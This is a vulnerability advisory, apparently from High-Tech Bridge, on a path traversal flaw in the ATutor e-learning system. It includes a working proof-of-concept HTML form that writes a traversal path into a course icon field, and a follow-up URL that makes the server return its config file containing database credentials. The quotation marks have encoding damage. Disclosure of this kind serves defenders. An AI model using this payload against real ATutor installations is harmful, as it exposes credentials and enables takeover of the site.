High-Tech Bridge Security Research Lab discovered path traversal vulnerability in a popular web-based e-learning system Atutor. A remote attacker can view contents of arbitrary local files on the target system with privileges of the web server.
The vulnerability may allow an attacker gain access to potentially sensitive web application and system information, and use received data to gain complete control over vulnerable web application.
Successful exploitation of vulnerability requires that user is registered and authenticated, but registration is open by default.
The vulnerability exists due to absence of filtration of user-supplied data passed via βiconβ HTTP POST to β/mods/_core/courses/users/create_course.phpβ script, when saving information to database. A remote authenticated attacker can use directory traversal sequences (e.g. ββ¦/β) in userβs icon parameter to overwrite its value and then include arbitrary file on the system and view its contents.
The following PoC code can be used to replace path to userβs icon in database. In this example, we will inject path to the system configuration β/include/config.inc.phpβ file:
<form action=βhttp://[host]/mods/_core/courses/users/create_course.phpβ method=βPOSTβ name=βf1β enctype=βmultipart/form-dataβ>
<input type=βhiddenβ name=βform_courseβ value=βtrueβ>
<input type=βhiddenβ name=βMAX_FILE_SIZEβ value=β819200β>
<input type=βhiddenβ name=βcourseβ value=β0β>
<input type=βhiddenβ name=βold_accessβ value=βprotectedβ>
<input type=βhiddenβ name=βcreated_dateβ value=β2016-02-17 13:20:26β>
<input type=βhiddenβ name=βshow_coursesβ value=β0β>
<input type=βhiddenβ name=βcurrent_catβ value=β0β>
<input type=βhiddenβ name=βtitleβ value=βvulnerableβ>
<input type=βhiddenβ name=βpri_langβ value=βenβ>
<input type=βhiddenβ name=βdescriptionβ value=ββ>
<input type=βhiddenβ name=βcategory_parentβ value=β0β>
<input type=βhiddenβ name=βcontent_packagingβ value=βtopβ>
<input type=βhiddenβ name=βrssβ value=β0β>
<input type=βhiddenβ name=βaccessβ value=βprotectedβ>
<input type=βhiddenβ name=βrelease_dateβ value=β0β>
<input type=βhiddenβ name=βday_releaseβ value=β0β>
<input type=βhiddenβ name=βmonth_releaseβ value=β0β>
<input type=βhiddenβ name=βyear_releaseβ value=β0β>
<input type=βhiddenβ name=βhour_releaseβ value=β0β>
<input type=βhiddenβ name=βmin_releaseβ value=β0β>
<input type=βhiddenβ name=βend_dateβ value=β0β>
<input type=βhiddenβ name=βday_endβ value=β0β>
<input type=βhiddenβ name=βmonth_endβ value=β0β>
<input type=βhiddenβ name=βyear_endβ value=β2016β>
<input type=βhiddenβ name=βhour_endβ value=β0β>
<input type=βhiddenβ name=βmin_endβ value=β0β>
<input type=βhiddenβ name=βbannerβ value=ββ>
<input type=βhiddenβ name=βinitial_contentβ value=β1β>
<input type=βhiddenβ name=βquotaβ value=β-2β>
<input type=βhiddenβ name=βfilesizeβ value=β-3β>
<input type=βhiddenβ name=βtrackingβ value=ββ>
<input type=βhiddenβ name=βcopyrightβ value=ββ>
<input type=βhiddenβ name=βboolForceβ value=ββ>
<input type=βhiddenβ name=βMAX_FILE_SIZEβ value=ββ>
<input type=βhiddenβ name=βcustomiconβ value=ββ>
<input type=βhiddenβ name=βcustOptCountβ value=β0β>
<input type=βhiddenβ name=βcourseIdβ value=β[COURSE_ID]β>
<input type=βhiddenβ name=βiconβ value=ββ¦/β¦/β¦/include/config.inc.phpβ>
<input type=βbuttonβ name=βsubmitβ value=βSaveβ>
</form>
The injected parameter is used in βreadfile()β function in the β/get_course_icon.phpβ script. To view contents of the β/include/config.inc.phpβ file and see database credentials, the attacker needs to open the following URL:
http://[code]/get_course_icon.php?id=[COURSE_ID]